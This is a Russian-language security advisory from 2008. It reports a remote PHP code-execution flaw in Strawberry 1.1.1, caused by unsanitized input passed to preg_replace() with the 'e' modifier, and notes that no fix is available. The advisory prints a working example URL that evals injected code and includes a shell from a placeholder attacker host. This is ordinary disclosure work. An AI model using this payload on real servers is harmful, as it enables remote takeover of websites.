Выполнение произвольного PHP кода в Strawberry

Дата публикации:
15.01.2008
Дата изменения:
15.01.2008
Всего просмотров:
1568
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Strawberry 1.x
Уязвимые версии: Strawberry 1.1.1, возможно более ранние версии

Описание:
Уязвимость позволяет удаленному пользователю скомпрометировать целевую систему.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "text" в сценарии plugins/wacko/highlight/html.php перед вызовом функции "preg_replace()" с параметром "e". Удаленный пользователь может внедрить и выполнить произвольный PHP код на целевой системе с привилегиями Web сервера. Пример:

http://[host]/strawberry/plugins/wacko/highlight/html.php?text=%3C!--{${eval($s)}}--%3E&s=include('[attacker]/shell');

URL производителя: strawberry.goodgirl.ru

Решение: Способов устранения уязвимости не существует в настоящее время.

или введите имя

CAPTCHA